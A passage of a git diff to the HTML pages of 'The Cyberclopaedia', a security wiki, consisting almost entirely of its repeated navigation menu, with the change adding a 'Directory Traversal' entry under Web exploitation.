        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html index 712cc858..8e2956cb 100644 --- a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -206,22 +206,6 @@

Filtered FSRs - - diff --git a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html index e295dc11..ab9ab6fd 100644 --- a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
